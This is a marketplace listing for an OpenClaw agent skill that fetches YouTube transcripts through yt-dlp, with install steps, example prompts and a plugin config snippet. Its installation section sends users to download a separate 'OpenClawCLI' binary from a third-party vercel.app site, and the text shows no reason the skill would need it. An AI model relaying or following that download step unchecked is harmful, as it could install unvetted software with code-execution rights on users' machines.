youtube-watcher
Fetch and read transcripts from YouTube videos. Use when you need to summarize a video, answer questions about its content, or extract information from it.
Why use this skill?
Learn how to use the OpenClaw YouTube Watcher skill to fetch video transcripts for instant summarization, data extraction, and content analysis.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/stveenli/ytwatchervideoWhat This Skill Does
The YouTube Watcher skill is a specialized agent capability designed to bridge the gap between multimedia content and text-based reasoning. By leveraging the OpenClawCLI, this tool extracts raw transcripts from YouTube video URLs. Once the text data is retrieved, the OpenClaw AI agent can process, analyze, and synthesize the information. This is particularly useful for users who prefer reading over watching long-form content or those who need to quickly locate specific data points within a video. The skill relies on external dependencies, specifically yt-dlp, to bridge the interface between the platform and the local system environment.
Installation
To utilize this skill, ensure that OpenClawCLI is properly installed on your Windows or MacOS environment. You can retrieve the latest version from https://openclawcli.vercel.app/. Once the CLI is set up, verify that yt-dlp is installed and accessible via your system's PATH variable, as this acts as the backbone for transcript extraction. To add the skill to your agent, execute the command: clawhub install openclaw/skills/skills/stveenli/ytwatchervideo. Ensure you have the necessary execution permissions within your project directory for the script to run effectively.
Use Cases
This skill is highly versatile for information management. It is primarily used for summarizing lengthy lectures, tutorials, or podcasts into concise bullet points. It also serves as an excellent tool for researchers performing content audits, allowing for quick searches for specific keywords across multiple video sources. Developers may find it useful for extracting code snippets or technical explanations mentioned in tutorial videos, while content creators can use it to repurpose video content into blog posts or documentation.
Example Prompts
- "Can you watch this video and give me a 5-bullet point summary of the main arguments presented? https://www.youtube.com/watch?v=dQw4w9WgXcQ"
- "Search the transcript of this tutorial and explain how to configure the authentication settings step-by-step: https://www.youtube.com/watch?v=exampleID"
- "Summarize the section of this video that talks about financial projections and extract any key data points mentioned."
Tips & Limitations
Success depends heavily on the presence of closed captions or auto-generated subtitles. If a creator has disabled subtitles, the script will be unable to extract data. Always verify that your network environment allows access to YouTube services, as the script makes external requests. For best results, use videos with high-quality, manually transcribed captions to ensure the accuracy of the information provided by the AI agent. If the script fails, check your yt-dlp installation first, as it is the most common point of failure.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-stveenli-ytwatchervideo": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, code-execution
Related Skills
phoenix-shield
Self-healing backup and update system with intelligent rollback. Protects against failed updates by automatically monitoring system health post-update and recovering from backups when needed. Features canary deployment testing, health baselines, smart rollback, and 24/7 automated monitoring. Use when performing critical system updates, managing production deployments, or ensuring high availability of services. Prevents downtime through pre-flight checks, integrity verification, and automatic recovery workflows.
browser-automation-skill
Advanced headless browser automation skill for OpenClaw agents. Enables intelligent web navigation, form filling, data extraction, and UI testing with structured commands and semantic element targeting.
copywriting
Write persuasive copy for landing pages, emails, ads, sales pages, and marketing materials. Use when you need to write headlines, CTAs, product descriptions, ad copy, email sequences, or any text meant to drive action. Covers copywriting formulas (AIDA, PAS, FAB), headline writing, emotional triggers, objection handling in copy, and A/B testing. Trigger on "write copy", "copywriting", "landing page copy", "headline", "write a sales page", "ad copy", "email copy", "persuasive writing", "how to write [marketing text]".
airbnb-search
Search Airbnb listings with prices, ratings, and direct links. No API key required.